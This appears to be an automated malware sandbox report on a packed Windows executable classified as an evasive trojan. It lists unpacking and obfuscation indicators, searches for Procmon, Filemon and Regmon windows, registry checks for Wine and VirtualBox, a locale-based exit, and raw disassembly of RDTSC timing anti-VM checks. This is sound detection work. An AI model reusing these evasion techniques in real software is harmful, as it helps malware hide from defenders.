              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007019140_2_00701914
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C71ED0_2_007C71ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B62390_2_007B6239
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BEAD00_2_007BEAD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089D3400_2_0089D340
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BB4700_2_007BB470
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C8CFE0_2_007C8CFE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C05D40_2_007C05D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007325B60_2_007325B6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075E5BC0_2_0075E5BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B47090_2_007B4709
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CA7BA0_2_007CA7BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C57970_2_007C5797
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00404A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: tcmgcthi ZLIB complexity 0.9945983701426837
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00423A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00423A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0041CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\7VN3CYW7.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1792512 > 1048576
              Source: file.exeStatic PE information: Raw size of tcmgcthi is bigger than: 0x100000 < 0x19bc00
              Source: Binary string: O&.Pdb source: file.exe

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tcmgcthi:EW;suhmtczi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tcmgcthi:EW;suhmtczi:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00426390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b5b36 should be: 0x1bbb9d
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: tcmgcthi
              Source: file.exeStatic PE information: section name: suhmtczi
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CF86C push ebp; mov dword ptr [esp], ecx0_2_007CF894
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083F8A0 push ebx; mov dword ptr [esp], 5FE7128Eh0_2_0083F8C4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083F8A0 push ecx; mov dword ptr [esp], ebp0_2_0083F8FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F0852 push ebp; mov dword ptr [esp], 4E9FEF27h0_2_007F0874
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F0852 push edx; mov dword ptr [esp], eax0_2_007F0901
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008620B6 push ebp; mov dword ptr [esp], 5623FCF2h0_2_008620D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008448B7 push 1723BBBBh; mov dword ptr [esp], ebx0_2_008448DC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008348B4 push esi; mov dword ptr [esp], edx0_2_008348E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D0043 push 1142E200h; mov dword ptr [esp], ebp0_2_007D008D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DC8C8 push 285E9500h; mov dword ptr [esp], eax0_2_008DC91D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push 16962A22h; mov dword ptr [esp], esi0_2_00751898
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push ecx; mov dword ptr [esp], ebx0_2_007518CA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push 0A43E341h; mov dword ptr [esp], edx0_2_007519C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push ecx; mov dword ptr [esp], ebx0_2_007519CD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00751822 push ebx; mov dword ptr [esp], edx0_2_007519E3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008050E7 push 727BD85Ch; mov dword ptr [esp], ecx0_2_0080524E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AD802 push 36AC93E0h; mov dword ptr [esp], ebx0_2_008AD81D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088F013 push 3509FDD5h; mov dword ptr [esp], ebp0_2_0088F494
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DF036 push ebp; mov dword ptr [esp], eax0_2_008DF0BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DF036 push eax; mov dword ptr [esp], edx0_2_008DF1B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B50BB push 0A490BCAh; mov dword ptr [esp], edx0_2_006B50E2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B50BB push ebx; mov dword ptr [esp], 00000000h0_2_006B518E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427895 push ecx; ret 0_2_004278A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push ebx; mov dword ptr [esp], ecx0_2_007B98D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push ebx; mov dword ptr [esp], edx0_2_007B9900
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push 6B0486E7h; mov dword ptr [esp], eax0_2_007B9920
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push 5DCF5ABBh; mov dword ptr [esp], edx0_2_007B9941
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push ecx; mov dword ptr [esp], ebx0_2_007B9986
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push 3781C2E8h; mov dword ptr [esp], esi0_2_007B9A84
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push eax; mov dword ptr [esp], ebx0_2_007B9ADB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9896 push 4AF6DE8Dh; mov dword ptr [esp], edx0_2_007B9B22
              Source: file.exeStatic PE information: section name: tcmgcthi entropy: 7.953211456114112

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00426390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25981
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6500DA second address: 64F974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FE4C10F4F68h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f jmp 00007FE4C10F4F72h 0x00000014 push dword ptr [ebp+122D1615h] 0x0000001a mov dword ptr [ebp+122D3876h], eax 0x00000020 call dword ptr [ebp+122D1B95h] 0x00000026 pushad 0x00000027 jmp 00007FE4C10F4F73h 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f push ecx 0x00000030 mov dword ptr [ebp+122D17ECh], eax 0x00000036 pop edi 0x00000037 add dword ptr [ebp+122D3870h], edi 0x0000003d popad 0x0000003e jbe 00007FE4C10F4F6Ch 0x00000044 mov dword ptr [ebp+122D3870h], edx 0x0000004a mov edx, dword ptr [esp+28h] 0x0000004e jp 00007FE4C10F4F72h 0x00000054 js 00007FE4C10F4F6Ch 0x0000005a mov dword ptr [ebp+122D3870h], eax 0x00000060 mov dword ptr [ebp+122D2AE8h], eax 0x00000066 pushad 0x00000067 add dword ptr [ebp+122D3870h], eax 0x0000006d popad 0x0000006e mov esi, 0000003Ch 0x00000073 jmp 00007FE4C10F4F6Ch 0x00000078 add esi, dword ptr [esp+24h] 0x0000007c mov dword ptr [ebp+122D17E1h], edx 0x00000082 lodsw 0x00000084 jmp 00007FE4C10F4F75h 0x00000089 add eax, dword ptr [esp+24h] 0x0000008d cld 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 jmp 00007FE4C10F4F77h 0x00000097 nop 0x00000098 pushad 0x00000099 jmp 00007FE4C10F4F6Eh 0x0000009e pushad 0x0000009f push eax 0x000000a0 push edx 0x000000a1 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1C9C second address: 7C1CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1CA5 second address: 7C1CAF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE4C10F4F79h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1CAF second address: 7C1CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C120028Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF33D second address: 7CF343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF4DB second address: 7CF4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FE4C120028Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7A2 second address: 7CF7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7A7 second address: 7CF7D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE4C1200290h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007FE4C1200290h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FE4C1200286h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF956 second address: 7CF97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 jl 00007FE4C10F4F92h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE4C10F4F74h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF97C second address: 7CF980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF980 second address: 7CF986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C9A second address: 7D1C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C9E second address: 64F974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FE4C10F4F6Ch 0x0000000c popad 0x0000000d add dword ptr [esp], 078A96DAh 0x00000014 pushad 0x00000015 mov ebx, 0DDA0F3Bh 0x0000001a mov edx, ebx 0x0000001c popad 0x0000001d push dword ptr [ebp+122D1615h] 0x00000023 call dword ptr [ebp+122D1B95h] 0x00000029 pushad 0x0000002a jmp 00007FE4C10F4F73h 0x0000002f xor eax, eax 0x00000031 pushad 0x00000032 push ecx 0x00000033 mov dword ptr [ebp+122D17ECh], eax 0x00000039 pop edi 0x0000003a add dword ptr [ebp+122D3870h], edi 0x00000040 popad 0x00000041 jbe 00007FE4C10F4F6Ch 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b jp 00007FE4C10F4F72h 0x00000051 js 00007FE4C10F4F6Ch 0x00000057 mov dword ptr [ebp+122D3870h], eax 0x0000005d mov dword ptr [ebp+122D2AE8h], eax 0x00000063 pushad 0x00000064 add dword ptr [ebp+122D3870h], eax 0x0000006a popad 0x0000006b mov esi, 0000003Ch 0x00000070 jmp 00007FE4C10F4F6Ch 0x00000075 add esi, dword ptr [esp+24h] 0x00000079 mov dword ptr [ebp+122D17E1h], edx 0x0000007f lodsw 0x00000081 jmp 00007FE4C10F4F75h 0x00000086 add eax, dword ptr [esp+24h] 0x0000008a cld 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f jmp 00007FE4C10F4F77h 0x00000094 nop 0x00000095 pushad 0x00000096 jmp 00007FE4C10F4F6Eh 0x0000009b pushad 0x0000009c push eax 0x0000009d push edx 0x0000009e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1D53 second address: 7D1D60 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1D60 second address: 7D1DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xor dword ptr [esp], 01877894h 0x0000000d jmp 00007FE4C10F4F74h 0x00000012 xor dh, FFFFFFBAh 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FE4C10F4F68h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D19F0h], edx 0x00000037 mov ecx, dword ptr [ebp+122D29BCh] 0x0000003d push 00000000h 0x0000003f mov ch, bl 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007FE4C10F4F68h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d mov cx, 0BA1h 0x00000061 mov ecx, dword ptr [ebp+122D2C74h] 0x00000067 push 44D5563Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e push edi 0x0000006f jns 00007FE4C10F4F66h 0x00000075 pop edi 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1DF1 second address: 7D1E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C1200292h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E07 second address: 7D1E52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7B2AA9C4h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FE4C10F4F68h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 lea ebx, dword ptr [ebp+12455C07h] 0x0000002f mov dword ptr [ebp+122D2434h], ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jnl 00007FE4C10F4F66h 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E52 second address: 7D1E6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200295h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1E6B second address: 7D1E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F28 second address: 7D1F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F2E second address: 7D1F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F32 second address: 7D1F91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4F8CCADEh 0x0000000f jo 00007FE4C120028Ch 0x00000015 mov dword ptr [ebp+122D1963h], edx 0x0000001b push 00000003h 0x0000001d mov edx, dword ptr [ebp+122D2914h] 0x00000023 push 00000000h 0x00000025 or dh, 00000024h 0x00000028 push 00000003h 0x0000002a mov edx, dword ptr [ebp+122D2A24h] 0x00000030 mov dx, 2B30h 0x00000034 push 791C0BC6h 0x00000039 jg 00007FE4C120028Eh 0x0000003f add dword ptr [esp], 46E3F43Ah 0x00000046 or esi, 2A1452CFh 0x0000004c lea ebx, dword ptr [ebp+12455C10h] 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F91 second address: 7D1F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1FF1 second address: 7D1FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1FF7 second address: 7D2011 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4C10F4F6Ch 0x00000008 jns 00007FE4C10F4F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 jne 00007FE4C10F4F6Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2011 second address: 7D2069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 movsx edx, cx 0x00000009 push 00000000h 0x0000000b xor dword ptr [ebp+122D28E9h], ebx 0x00000011 push CE16D917h 0x00000016 pushad 0x00000017 jnc 00007FE4C1200288h 0x0000001d push esi 0x0000001e push edx 0x0000001f pop edx 0x00000020 pop esi 0x00000021 popad 0x00000022 add dword ptr [esp], 31E92769h 0x00000029 jmp 00007FE4C120028Fh 0x0000002e push 00000003h 0x00000030 sbb edi, 208EADB2h 0x00000036 push 00000000h 0x00000038 movzx esi, ax 0x0000003b push 00000003h 0x0000003d xor si, 10E6h 0x00000042 push 8BC5CF01h 0x00000047 push eax 0x00000048 push edx 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2069 second address: 7D206E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2708 second address: 7F270F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE5AC second address: 7BE5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Ch 0x00000007 jmp 00007FE4C10F4F6Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE5CB second address: 7BE5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE5CF second address: 7BE5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FE4C10F4F95h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE5DE second address: 7BE5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FE4C1200286h 0x0000000d jo 00007FE4C1200286h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0BC2 second address: 7F0BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F72h 0x00000007 pushad 0x00000008 jns 00007FE4C10F4F66h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0FA7 second address: 7F0FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jl 00007FE4C1200294h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0FB9 second address: 7F0FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F10FB second address: 7F1116 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE4C1200288h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE4C120028Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1116 second address: 7F111A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F17EF second address: 7F1805 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FE4C1200286h 0x0000000d jo 00007FE4C1200286h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1DE8 second address: 7F1DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F1F82 second address: 7F1F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F20B3 second address: 7F20B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
